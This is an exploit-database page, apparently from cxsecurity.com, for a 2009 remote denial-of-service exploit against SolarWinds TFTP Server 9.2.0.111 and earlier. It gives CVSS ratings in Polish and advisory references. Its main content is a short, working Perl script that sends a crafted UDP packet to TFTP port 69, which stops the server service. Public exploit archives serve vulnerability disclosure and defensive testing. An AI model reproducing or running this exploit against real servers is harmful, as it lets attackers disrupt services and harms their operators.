SolarWinds TFTP Server <=9.2.0.111 Remote DoS Exploit

2009-09-15 / 2009-09-16
Credit: Gaurav Baruah
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-20


Ogólna skala CVSS: 5/10
Znaczenie: 2.9/10
Łatwość wykorzystania: 10/10
Wymagany dostęp: Zdalny
Złożoność ataku: Niska
Autoryzacja: Nie wymagana
Wpływ na poufność: Brak
Wpływ na integralność: Brak
Wpływ na dostępność: Częściowy

#!/usr/bin/perl # SolarWinds TFTP Server <=9.2.0.111 Remote DoS Exploit # by Gaurav Baruah # TFTP Server Service stops after payload # is sent, and has to be started again in Config # Tested on XP SP3 # Big thnx: dragunov # Greetz: Sanjay use IO::Socket; $port = "69"; $host = "127.0.0.1"; $tftpudp = IO::Socket::INET->new(PeerPort => $port,PeerAddr => $host,Proto=> 'udp'); $boom= "\x00\x06\x54\x9d\x68\x21\xde\x59\x30\x9a\x0b\xb5\xd4\x94\x94\x42\x3c\xeb\xc5". "\xc1\xe8\x7d\x31\x34\xee\xd8\x60\x41\x8f\x92\x25\x9c\x5c\xcc\x78\x6a"; $tftpudp->send($boom);

Referencje:

http://www.securityfocus.com/bid/36182
http://www.milw0rm.com/exploits/9547
http://secunia.com/advisories/36505


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top